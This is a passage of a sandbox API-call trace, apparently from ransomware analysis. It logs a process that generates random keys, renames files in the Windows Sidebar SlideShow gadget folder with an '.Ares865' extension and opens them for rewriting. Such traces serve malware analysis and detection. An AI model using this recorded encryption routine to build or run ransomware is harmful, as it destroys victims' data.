returned 1 [0117.256] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.257] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.257] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.257] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png.Ares865") returned 92 [0117.257] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_rest.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_rest.png.ares865"), dwFlags=0x1) returned 1 [0117.258] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_rest.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.259] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2904) returned 1 [0117.259] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.259] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.260] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.262] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.263] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.263] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.263] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png.Ares865") returned 94 [0117.263] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_down.png.ares865"), dwFlags=0x1) returned 1 [0117.265] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.265] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3162) returned 1 [0117.266] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.266] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.266] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.269] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.270] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.270] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.271] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png.Ares865") returned 93 [0117.271] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_hov.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_hov.png.ares865"), dwFlags=0x1) returned 1 [0117.272] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_hov.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.272] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3161) returned 1 [0117.272] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.273] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.273] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.283] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.286] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.286] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.286] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png.Ares865") returned 94 [0117.286] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_rest.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_rest.png.ares865"), dwFlags=0x1) returned 1 [0117.288] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_rest.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.288] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2982) returned 1 [0117.289] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.289] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.289] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.292] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.293] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.293] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.293] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg.Ares865") returned 88 [0117.294] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\tulip.jpg"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\tulip.jpg.ares865"), dwFlags=0x1) returned 1 [0117.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\tulip.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.304] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=400256) returned 1 [0117.304] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.305] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.305] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.395] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.396] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.396] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.401] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop" [0117.402] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\slideshow_glass_frame.png.Ares865") returned 115 [0117.402] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\slideshow_glass_frame.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\on_desktop\\slideshow_glass_frame.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\slideshow_glass_frame.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\on_desktop\\slideshow_glass_frame.png.ares865"), dwFlags=0x1) returned 1 [0117.406] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\slideshow_glass_frame.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\on_desktop\\slideshow_glass_frame.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.406] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5513) returned 1 [0117.406] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.407] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.407] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.414] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.419] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.419] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.422] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar" [0117.423] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\bg_sidebar.png.Ares865") returned 104 [0117.423] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\bg_sidebar.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\bg_sidebar.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\bg_sidebar.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\bg_sidebar.png.ares865"), dwFlags=0x1) returned 1 [0117.425] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\bg_sidebar.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\bg_sidebar.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.426] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3574) returned 1 [0117.426] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.427] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.427] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.429] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.430] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.430] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.431] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\slideshow_glass_frame.png.Ares865") returned 115 [0117.431] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\slideshow_glass_frame.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\slideshow_glass_frame.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\slideshow_glass_frame.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\slideshow_glass_frame.png.ares865"), dwFlags=0x1) returned 1 [0117.432] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\slideshow_glass_frame.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\slideshow_glass_frame.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.432] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3511) returned 1 [0117.433] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.433] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.433] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.436] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.436] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.436] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.437] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US" [0117.437] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html.Ares865") returned 91 [0117.437] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\settings.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\settings.html.ares865"), dwFlags=0x1) returned 1 [0117.439] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\settings.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.439] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6416) returned 1 [0117.439] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.440] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.440] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.447] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.448] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.448] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.448] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html.Ares865") returned 92 [0117.448] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\slideshow.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\slideshow.html.ares865"), dwFlags=0x1) returned 1 [0117.449] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\slideshow.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.449] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3428) returned 1 [0117.450] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.450] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.450] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.454] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.457] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.457] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.462] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js" [0117.464] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js.Ares865") returned 93 [0117.464] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\js\\slideshow.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\js\\slideshow.js.ares865"), dwFlags=0x1) returned 1 [0117.466] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\js\\slideshow.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.466] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=55660) returned 1 [0117.466] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.467] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.467] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.472] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.473] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.473] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.474] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css" [0117.475] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css.Ares865") returned 94 [0117.475] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\settings.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\settings.css.ares865"), dwFlags=0x1) returned 1 [0117.477] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\settings.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.477] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1296) returned 1 [0117.477] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.478] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.478] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.480] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.481] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.481] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.481] wsprintfW (in: param_1=0x2ccd198, 